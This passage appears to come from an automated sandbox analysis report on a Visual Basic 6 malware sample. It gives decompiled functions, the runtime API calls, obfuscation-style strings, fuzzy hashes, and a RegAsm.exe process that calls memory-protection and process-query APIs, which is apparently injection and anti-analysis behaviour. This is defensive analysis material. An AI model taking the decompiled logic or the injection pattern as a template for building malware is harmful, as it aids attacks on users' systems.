				L00401696();
				if(_v112 != 0) {
					_push(L"frostiness");
					L00401546();
				}
				_v52 =  *0x401430;
				_v60 = 5;
				_t55 =  &_v60;
				_push(_t55);
				L00401684();
				L0040168A();
				_push(_t55);
				_push(L"Double");
				L00401690();
				asm("sbb eax, eax");
				_v112 =  ~( ~( ~_t55));
				L004016C6();
				_t68 =  &_v60;
				L00401696();
				_t59 = _v112;
				_t81 = _t59;
				if(_t81 != 0) {
					_push(L"LONES");
					_push(0x6b);
					_push(0xffffffff);
					_push(0x20);
					L004015F4();
				}
				asm("fldz");
				L004014EC();
				L0040165A();
				asm("fcomp qword [0x401428]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t81 != 0) {
					L00401540();
					 *_t79 =  *0x40141c;
					 *_t79 =  *0x401418;
					_v84 =  *0x401414;
					 *_t79 =  *0x401410;
					_t59 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t68, _t68, _t68, _t68, _t59);
					asm("fclex");
					_v112 = _t59;
					if(_v112 >= 0) {
						_v124 = _v124 & 0x00000000;
					} else {
						_push(0x2c8);
						_push(0x40da14);
						_push(_a4);
						_push(_v112);
						L004016D8();
						_v124 = _t59;
					}
				}
				_v36 = 0x970e1bf0;
				_v32 = 0x5afd;
				asm("wait");
				_push(0x4117ac);
				L004016C6();
				L004016C6();
				return _t59;
			}

0x004115dc
0x004115eb
0x004115f5
0x004115fd
0x00411600
0x00411607
0x00411616
0x0041161f
0x0041162c
0x00411634
0x00411637
0x00411641
0x00411645
0x00411646
0x0041164b
0x00411652
0x0041165c
0x0041165d
0x00411660
0x00411661
0x00411666
0x0041166d
0x00411678
0x0041167a
0x0041167f
0x0041167f
0x0041168a
0x0041168d
0x00411694
0x00411697
0x00411698
0x004116a2
0x004116a7
0x004116a8
0x004116ad
0x004116b4
0x004116ba
0x004116c1
0x004116c6
0x004116c9
0x004116ce
0x004116d2
0x004116d4
0x004116d6
0x004116db
0x004116dd
0x004116df
0x004116e1
0x004116e1
0x004116e6
0x004116e8
0x004116ed
0x004116f2
0x004116f8
0x004116fa
0x004116fb
0x00411703
0x00411710
0x0041171a
0x00411724
0x0041172e
0x0041173b
0x00411741
0x00411743
0x0041174a
0x00411766
0x0041174c
0x0041174c
0x00411751
0x00411756
0x00411759
0x0041175c
0x00411761
0x00411761
0x0041174a
0x0041176a
0x00411771
0x00411778
0x00411779
0x0041179e
0x004117a6
0x004117ab

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 004115F5
__vbaStrCopy.MSVBVM60(?,?,?,?,00401486), ref: 0041161F
__vbaStrCopy.MSVBVM60(?,?,?,?,00401486), ref: 0041162C
#524.MSVBVM60(?,00004008), ref: 00411646
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,00004008), ref: 00411661
__vbaFreeVar.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041166D
#531.MSVBVM60(frostiness,00008008,?,?,?,?,00004008), ref: 0041167F
#591.MSVBVM60(00000005,00008008,?,?,?,?,00004008), ref: 00411698
__vbaStrMove.MSVBVM60(00000005,00008008,?,?,?,?,00004008), ref: 004116A2
__vbaStrCmp.MSVBVM60(Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 004116AD
__vbaFreeStr.MSVBVM60(Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 004116C1
__vbaFreeVar.MSVBVM60(Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 004116C9
__vbaFileOpen.MSVBVM60(00000020,000000FF,0000006B,LONES,Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 004116E1
_CIexp.MSVBVM60(Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 004116E8
__vbaFpR8.MSVBVM60(Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 004116ED
__vbaFpI4.MSVBVM60(Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 00411703
__vbaHresultCheckObj.MSVBVM60(00000000,00401438,0040DA14,000002C8,?,?,?,?,00000000,Double,00000000,00000005,00008008,?), ref: 0041175C
__vbaFreeStr.MSVBVM60(004117AC,Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 0041179E
__vbaFreeStr.MSVBVM60(004117AC,Double,00000000,00000005,00008008,?,?,?,?,00004008), ref: 004117A6

Strings

LONES, xrefs: 004116D6
Double, xrefs: 004116A8
frostiness, xrefs: 0041167A

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Copy$#524#531#591CheckChkstkFileHresultIexpMoveOpen
String ID: Double$LONES$frostiness
API String ID: 854741229-3053727711
Opcode ID: 5e094c8688919cce2c9832879e72e9e979a87d359edb1f0ae9fdb7747f4eb967
Instruction ID: 8dd4faf53b8c5ea6f1a5be1ec071e011d95c814780903164dcdd15cd3d7b36b9
Opcode Fuzzy Hash: 5e094c8688919cce2c9832879e72e9e979a87d359edb1f0ae9fdb7747f4eb967
Instruction Fuzzy Hash: B0412A71900209ABDB00EFA2CD45AEEBBB8AF04704F54893AF541BB2F1DB395545CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004110F7, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E004110F7(void* __ebx, void* __edi, void* __esi, void* __eflags, long long __fp0, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v44;
				char _v52;
				intOrPtr _v60;
				char _v68;
				char* _v76;
				intOrPtr _v84;
				signed int _v104;
				signed int _v116;
				signed long long _v120;
				signed int _v124;
				signed short _t69;
				char* _t73;
				signed int _t76;
				char* _t80;
				void* _t94;
				void* _t96;
				long long* _t97;
				intOrPtr* _t98;

				_t97 = _t96 - 0xc;
				 *[fs:0x0] = _t97;
				L00401480();
				_v16 = _t97;
				_v12 = 0x4013f0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x401486, _t94);
				L00401660();
				_v44 = 1;
				_v52 = 2;
				_push(0);
				_push( &_v52);
				L004015A0();
				L0040168A();
				_t80 =  &_v52;
				L00401696();
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				_push( &_v68);
				_push( &_v52);
				asm("fld1");
				_push(_t80);
				_push(_t80);
				 *_t97 = __fp0;
				asm("fld1");
				_push(_t80);
				_push(_t80);
				 *_t97 = __fp0;
				asm("fld1");
				_push(_t80);
				_push(_t80);
				 *_t97 = __fp0;
				asm("fld1");
				_push(_t80);
				_push(_t80);
				 *_t97 = __fp0;
				L00401654();
				L0040165A();
				asm("fcomp qword [0x4013a0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t21 =  &_v116;
					 *_t21 = _v116 & 0x00000000;
					__eflags =  *_t21;
				} else {
					_v116 = 1;
				}
				_v104 =  ~_v116;
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L0040164E();
				_t98 = _t97 + 0xc;
				if(_v104 != 0) {
					_v120 =  *0x4013e8 *  *0x4013e0;
					 *_t98 = _v120;
					_t76 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t80);
					asm("fclex");
					_v104 = _t76;
					if(_v104 >= 0) {
						_t38 =  &_v124;
						 *_t38 = _v124 & 0x00000000;
						__eflags =  *_t38;
					} else {
						_push(0x84);
						_push(0x40da14);
						_push(_a4);
						_push(_v104);
						L004016D8();
						_v124 = _t76;
					}
				}
				_v44 = 0x64d4;
				_v52 = 2;
				_t69 =  &_v52;
				_push(_t69);
				L0040155E();
				asm("sbb eax, eax");
				_v104 =  ~( ~( ~_t69));
				L00401696();
				_t73 = _v104;
				if(_t73 != 0) {
					_v76 = L"Lgelige";
					_v84 = 8;
					L0040167E();
					_t73 =  &_v52;
					_push(_t73);
					L00401558();
					L0040168A();
					L00401696();
				}
				asm("wait");
				_push(0x4112db);
				L004016C6();
				L004016C6();
				L004016C6();
				return _t73;
			}

0x004110fa
0x00411109
0x00411113
0x0041111b
0x0041111e
0x00411125
0x00411134
0x0041113d
0x00411142
0x00411149
0x00411150
0x00411155
0x00411156
0x00411160
0x00411165
0x00411168
0x0041116d
0x00411174
0x0041117b
0x00411182
0x0041118c
0x00411190
0x00411191
0x00411193
0x00411194
0x00411195
0x00411198
0x0041119a
0x0041119b
0x0041119c
0x0041119f
0x004111a1
0x004111a2
0x004111a3
0x004111a6
0x004111a8
0x004111a9
0x004111aa
0x004111ad
0x004111b2
0x004111b7
0x004111bd
0x004111bf
0x004111c0
0x004111cb
0x004111cb
0x004111cb
0x004111c2
0x004111c2
0x004111c2
0x004111d4
0x004111db
0x004111df
0x004111e0
0x004111e2
0x004111e7
0x004111f0
0x004111fe
0x00411205
0x00411210
0x00411216
0x00411218
0x0041121f
0x0041123b
0x0041123b
0x0041123b
0x00411221
0x00411221
0x00411226
0x0041122b
0x0041122e
0x00411231
0x00411236
0x00411236
0x0041121f
0x0041123f
0x00411246
0x0041124d
0x00411250
0x00411251
0x00411259
0x0041125f
0x00411266
0x0041126b
0x00411271
0x00411273
0x0041127a
0x00411287
0x0041128c
0x0041128f
0x00411290
0x0041129a
0x004112a2
0x004112a2
0x004112a7
0x004112a8
0x004112c5
0x004112cd
0x004112d5
0x004112da

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 00411113
__vbaStrCopy.MSVBVM60(?,?,?,?,00401486), ref: 0041113D
#705.MSVBVM60(00000002,00000000), ref: 00411156
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 00411160
__vbaFreeVar.MSVBVM60(00000002,00000000), ref: 00411168
#675.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A,?,?,00000002,00000000), ref: 004111AD
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A,?,?,00000002,00000000), ref: 004111B2
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 004111E2
__vbaHresultCheckObj.MSVBVM60(00000000,004013F0,0040DA14,00000084), ref: 00411231
#592.MSVBVM60(00000002), ref: 00411251
__vbaFreeVar.MSVBVM60(00000002), ref: 00411266
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,00000002), ref: 00411287
#667.MSVBVM60(00000002,?,?,?,?,?,?,?,00000002), ref: 00411290
__vbaStrMove.MSVBVM60(00000002,?,?,?,?,?,?,?,00000002), ref: 0041129A
__vbaFreeVar.MSVBVM60(00000002,?,?,?,?,?,?,?,00000002), ref: 004112A2
__vbaFreeStr.MSVBVM60(004112DB,00000002), ref: 004112C5
__vbaFreeStr.MSVBVM60(004112DB,00000002), ref: 004112CD
__vbaFreeStr.MSVBVM60(004112DB,00000002), ref: 004112D5

Strings

Lgelige, xrefs: 00411273

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#592#667#675#705CheckChkstkCopyHresultList
String ID: Lgelige
API String ID: 2080591275-2071385871
Opcode ID: 84fe62c853627116e9427ce05d6a417005d98dba80da73fdd37b79cec1feaa81
Instruction ID: 410ff055148777f265ce2ccfa4d7634719be4cc083aad18d4530be23c5e2f501
Opcode Fuzzy Hash: 84fe62c853627116e9427ce05d6a417005d98dba80da73fdd37b79cec1feaa81
Instruction Fuzzy Hash: A6514670910219ABDB00EFA1DD8ABEEBBB8FF04704F14452EF501BB2A1DB795944CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00411ABD, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00411ABD(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				intOrPtr _v44;
				char _v52;
				short _v72;
				signed int _t32;
				char* _t37;
				void* _t50;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t55;

				_t55 = __fp0;
				_t53 = _t52 - 0xc;
				 *[fs:0x0] = _t53;
				L00401480();
				_v16 = _t53;
				_v12 = 0x401458;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x401486, _t50);
				_push( &_v52);
				L004015DC();
				_push( &_v52);
				L004015E2();
				L0040168A();
				L00401696();
				_v44 = 0x80020004;
				_v52 = 0xa;
				_t32 =  &_v52;
				_push(_t32);
				L0040152E();
				L0040168A();
				_push(_t32);
				_push(L"tiltros");
				L00401690();
				asm("sbb eax, eax");
				_v72 =  ~( ~_t32 + 1);
				L004016C6();
				L00401696();
				if(_v72 != 0) {
					L0040157C();
				}
				_v44 = 0x80020004;
				_v52 = 0xa;
				_t37 =  &_v52;
				_push(_t37);
				L00401528();
				_v32 = _t55;
				L00401696();
				asm("wait");
				_push(0x411bb9);
				L004016C6();
				return _t37;
			}

0x00411abd
0x00411ac0
0x00411acf
0x00411ad9
0x00411ae1
0x00411ae4
0x00411aeb
0x00411afa
0x00411b00
0x00411b01
0x00411b09
0x00411b0a
0x00411b14
0x00411b1c
0x00411b21
0x00411b28
0x00411b2f
0x00411b32
0x00411b33
0x00411b3d
0x00411b42
0x00411b43
0x00411b48
0x00411b4f
0x00411b54
0x00411b5b
0x00411b63
0x00411b6e
0x00411b70
0x00411b70
0x00411b75
0x00411b7c
0x00411b83
0x00411b86
0x00411b87
0x00411b8c
0x00411b92
0x00411b97
0x00411b98
0x00411bb3
0x00411bb8

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 00411AD9
#612.MSVBVM60(?,?,?,?,?,00401486), ref: 00411B01
__vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,00401486), ref: 00411B0A
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,00401486), ref: 00411B14
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401486), ref: 00411B1C
#646.MSVBVM60(0000000A), ref: 00411B33
__vbaStrMove.MSVBVM60(0000000A), ref: 00411B3D
__vbaStrCmp.MSVBVM60(tiltros,00000000,0000000A), ref: 00411B48
__vbaFreeStr.MSVBVM60(tiltros,00000000,0000000A), ref: 00411B5B
__vbaFreeVar.MSVBVM60(tiltros,00000000,0000000A), ref: 00411B63
__vbaEnd.MSVBVM60(tiltros,00000000,0000000A), ref: 00411B70
#593.MSVBVM60(0000000A,tiltros,00000000,0000000A), ref: 00411B87
__vbaFreeVar.MSVBVM60(0000000A,tiltros,00000000,0000000A), ref: 00411B92
__vbaFreeStr.MSVBVM60(00411BB9,0000000A,tiltros,00000000,0000000A), ref: 00411BB3

Strings

tiltros, xrefs: 00411B43

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#593#612#646Chkstk
String ID: tiltros
API String ID: 2731471570-1848849283
Opcode ID: 1bcc0a0e7b2abcca06d108fdb33114779f429d41bb404d5cbed8d1ef236c3dde
Instruction ID: 7203d05236d9ef29078c7289e2a99979a10224c04cd83150b819998a2b0f3342
Opcode Fuzzy Hash: 1bcc0a0e7b2abcca06d108fdb33114779f429d41bb404d5cbed8d1ef236c3dde
Instruction Fuzzy Hash: 9A212871950259ABCB00EBA1DD86EEDBBB8BF04708F14452EF502B71A1EB38A504CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004117D9, Relevance: 25.7, APIs: 17, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E004117D9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				void* _v32;
				char _v36;
				char _v52;
				char _v68;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v116;
				void* _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v172;
				void* _t97;
				signed int _t102;
				signed int _t105;
				signed int _t111;
				signed int _t117;
				signed int _t123;
				signed int _t128;
				void* _t140;
				void* _t142;
				intOrPtr _t143;

				_t143 = _t142 - 0xc;
				 *[fs:0x0] = _t143;
				L00401480();
				_v16 = _t143;
				_v12 = 0x401448;
				_v8 = 0;
				_t97 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401486, _t140);
				L00401660();
				_push(0x40de50);
				L0040153A();
				if(_t97 != 2) {
					if( *0x41331c != 0) {
						_v148 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v148 = 0x41331c;
					}
					_v124 =  *_v148;
					_t123 =  *((intOrPtr*)( *_v124 + 0x1c))(_v124,  &_v36);
					asm("fclex");
					_v128 = _t123;
					if(_v128 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40dddc);
						_push(_v124);
						_push(_v128);
						L004016D8();
						_v152 = _t123;
					}
					_v132 = _v36;
					_t128 =  *((intOrPtr*)( *_v132 + 0x64))(_v132, 1,  &_v120);
					asm("fclex");
					_v136 = _t128;
					if(_v136 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x40de3c);
						_push(_v132);
						_push(_v136);
						L004016D8();
						_v156 = _t128;
					}
					_v28 = _v120;
					L004016C0();
				}
				if(0 != 0) {
					_t117 =  *((intOrPtr*)( *_a4 + 0x710))(_a4);
					_v124 = _t117;
					if(_v124 >= 0) {
						_v160 = _v160 & 0x00000000;
					} else {
						_push(0x710);
						_push(0x40da44);
						_push(_a4);
						_push(_v124);
						L004016D8();
						_v160 = _t117;
					}
				}
				_v92 = 0x40e364;
				_v100 = 8;
				L0040167E();
				_push( &_v52);
				_push( &_v68);
				L00401534();
				_v108 = 0x40e370;
				_v116 = 0x8008;
				_push( &_v68);
				_t102 =  &_v116;
				_push(_t102);
				L00401648();
				_v124 = _t102;
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L0040164E();
				_t105 = _v124;
				if(_t105 != 0) {
					if( *0x41331c != 0) {
						_v164 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v164 = 0x41331c;
					}
					_v124 =  *_v164;
					_t111 =  *((intOrPtr*)( *_v124 + 0x1c))(_v124,  &_v36);
					asm("fclex");
					_v128 = _t111;
					if(_v128 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40dddc);
						_push(_v124);
						_push(_v128);
						L004016D8();
						_v168 = _t111;
					}
					_v132 = _v36;
					_t105 =  *((intOrPtr*)( *_v132 + 0x50))(_v132);
					asm("fclex");
					_v136 = _t105;
					if(_v136 >= 0) {
						_v172 = _v172 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x40de3c);
						_push(_v132);
						_push(_v136);
						L004016D8();
						_v172 = _t105;
					}
					L004016C0();
				}
				_push(0x411a9e);
				L004016C6();
				return _t105;
			}

0x004117dc
0x004117eb
0x004117f7
0x004117ff
0x00411802
0x00411809
0x00411818
0x00411821
0x00411826
0x0041182b
0x00411833
0x00411840
0x0041185d
0x00411842
0x00411842
0x00411847
0x0041184c
0x00411851
0x00411851
0x0041186f
0x0041187e
0x00411881
0x00411883
0x0041188a
0x004118a6
0x0041188c
0x0041188c
0x0041188e
0x00411893
0x00411896
0x00411899
0x0041189e
0x0041189e
0x004118b0
0x004118c1
0x004118c4
0x004118c6
0x004118d3
0x004118f2
0x004118d5
0x004118d5
0x004118d7
0x004118dc
0x004118df
0x004118e5
0x004118ea
0x004118ea
0x004118fd
0x00411904
0x00411904
0x0041190d
0x00411917
0x0041191d
0x00411924
0x00411943
0x00411926
0x00411926
0x0041192b
0x00411930
0x00411933
0x00411936
0x0041193b
0x0041193b
0x00411924
0x0041194a
0x00411951
0x0041195e
0x00411966
0x0041196a
0x0041196b
0x00411970
0x00411977
0x00411981
0x00411982
0x00411985
0x00411986
0x0041198b
0x00411992
0x00411996
0x00411997
0x00411999
0x004119a1
0x004119a7
0x004119b4
0x004119d1
0x004119b6
0x004119b6
0x004119bb
0x004119c0
0x004119c5
0x004119c5
0x004119e3
0x004119f2
0x004119f5
0x004119f7
0x004119fe
0x00411a1a
0x00411a00
0x00411a00
0x00411a02
0x00411a07
0x00411a0a
0x00411a0d
0x00411a12
0x00411a12
0x00411a24
0x00411a2f
0x00411a32
0x00411a34
0x00411a41
0x00411a60
0x00411a43
0x00411a43
0x00411a45
0x00411a4a
0x00411a4d
0x00411a53
0x00411a58
0x00411a58
0x00411a6a
0x00411a6a
0x00411a6f
0x00411a98
0x00411a9d

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 004117F7
__vbaStrCopy.MSVBVM60(?,?,?,?,00401486), ref: 00411821
__vbaLenBstrB.MSVBVM60(0040DE50,?,?,?,?,00401486), ref: 0041182B
__vbaNew2.MSVBVM60(0040DDEC,0041331C,0040DE50,?,?,?,?,00401486), ref: 0041184C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,0000001C), ref: 00411899
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DE3C,00000064), ref: 004118E5
__vbaFreeObj.MSVBVM60(00000000,?,0040DE3C,00000064), ref: 00411904
__vbaHresultCheckObj.MSVBVM60(00000000,00401448,0040DA44,00000710), ref: 00411936
__vbaVarDup.MSVBVM60 ref: 0041195E
#522.MSVBVM60(?,?), ref: 0041196B
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 00411986
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 00411999
__vbaNew2.MSVBVM60(0040DDEC,0041331C,?,?,00401486), ref: 004119C0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,0000001C), ref: 00411A0D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DE3C,00000050), ref: 00411A53
__vbaFreeObj.MSVBVM60(00000000,?,0040DE3C,00000050), ref: 00411A6A
__vbaFreeStr.MSVBVM60(00411A9E,?,?,00401486), ref: 00411A98

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$#522BstrChkstkCopyList
String ID:
API String ID: 1141394789-0
Opcode ID: 811222647023486503604d40fb2f967264422d6d0c8b293efe2c8de7650aaaed
Instruction ID: 4ac24e0d88f57b1d4588e6ad67e1acfff0afac0c3c860198576893a4ae7016f5
Opcode Fuzzy Hash: 811222647023486503604d40fb2f967264422d6d0c8b293efe2c8de7650aaaed
Instruction Fuzzy Hash: 5F81B270D10218AFDF20AFA5CC45BDDBBB4BF08304F20446AE505BB2A2DB799985DF59

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 6044 Parent PID: 6608 RegAsm.exeCOMMON

Executed Functions

Function 01107349, Relevance: 2.0, APIs: 1, Instructions: 495COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e4635d440eee0ad6e24804b242b2b05b351408e6ba7b5e011445515b32eb1b
Instruction ID: 2deea1307b2650b52af00753662e02fef1634738cd7a475c03a5febf7604e48a
Opcode Fuzzy Hash: f4e4635d440eee0ad6e24804b242b2b05b351408e6ba7b5e011445515b32eb1b
Instruction Fuzzy Hash: 9EF11570E44206EEFF2F1E28CC997E93662BF15344F964126ED869B1C0D7F5A8C58B42

Uniqueness

Uniqueness Score: -1.00%

Function 01106E63, Relevance: 1.7, APIs: 1, Instructions: 237nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,011069DC,00000040,01102813,00000000,00000000,00000000,00000000,?), ref: 01106E3B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 18ac40ed60e74fc307e046bfdac9059f4d7fd43d4853e06ecd7bc6921300e742
Instruction ID: 0f76ceab368bb92ad7f54d5a514c79a8fe37302f0ff3eecb9b00ae41a73b7572
Opcode Fuzzy Hash: 18ac40ed60e74fc307e046bfdac9059f4d7fd43d4853e06ecd7bc6921300e742
Instruction Fuzzy Hash: D04169B155DB945FE30ED724CCE9E3A3FADEB9A210B09429FD182C70E3E6559846C321

Uniqueness

Uniqueness Score: -1.00%

Function 01106E47, Relevance: 1.7, APIs: 1, Instructions: 228nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,011069DC,00000040,01102813,00000000,00000000,00000000,00000000,?), ref: 01106E3B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: bbe39099a176d9581427aaa16b13b8b58a6695a2397574605a5db888ca29da7d
Instruction ID: a2124dfae5a591d9385c658cb36ad82ae5b52a65b7979a00b894b5b39d29e31d
Opcode Fuzzy Hash: bbe39099a176d9581427aaa16b13b8b58a6695a2397574605a5db888ca29da7d
Instruction Fuzzy Hash: C241AAB111DA945FE30ED728CCE9F3A3BA9EB96710B09819FE082C70E3D554AC46C321

Uniqueness

Uniqueness Score: -1.00%

Function 01107363, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85dfc29cf5a53098df70570260f355675d23a64cfdadb4a3b4599b1503cf2df7
Instruction ID: d29ff8d1310ae275542a723ae83290e379fa75657dd68d803800e28027f09866
Opcode Fuzzy Hash: 85dfc29cf5a53098df70570260f355675d23a64cfdadb4a3b4599b1503cf2df7
Instruction Fuzzy Hash: 5A410631E0C646CEEF2F292888A83B53A626B05254FA71567D9C3C74D1D3F5B4C5C693

Uniqueness

Uniqueness Score: -1.00%

Function 01107384, Relevance: 1.7, APIs: 1, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d00ced093dadbfe48e6408d02d0592c035e78e3261bad61963d5601b5c17cbd3
Instruction ID: 5fa4ba5fe4a893cebf32322287de0a402c1d26064b4b5f73f54895eaa890d343
Opcode Fuzzy Hash: d00ced093dadbfe48e6408d02d0592c035e78e3261bad61963d5601b5c17cbd3
Instruction Fuzzy Hash: 46412831E08646CEEF2F292888A83B93A63AB05360F9B1557D9C3874D1D3F5B4C5C693

Uniqueness

Uniqueness Score: -1.00%

Function 01107477, Relevance: 1.6, APIs: 1, Instructions: 149nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0110777B

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 793699dc54811d8447b776cfc4128c0cc2fd28f922926ade8e97aee34eb2018a
Instruction ID: a71cb908f35a53e2b981316c34c34b28c53fc26de0176c4bc1ac405fc8ed3928
Opcode Fuzzy Hash: 793699dc54811d8447b776cfc4128c0cc2fd28f922926ade8e97aee34eb2018a
Instruction Fuzzy Hash: FE413971E08246CEEB2F292888A83F57E56BB05394F971557D4C3C70D1E3E1B485C693

Uniqueness

Uniqueness Score: -1.00%

Function 01107437, Relevance: 1.6, APIs: 1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2077f1aabd2467a96f5229c010f6208ad0b30cdc07cbf7f898b69ea09d20579e
Instruction ID: c26f0300b0613c0973dcb63cee4875ad9ad77e41a5a5c46e20a11d941f9be1ae
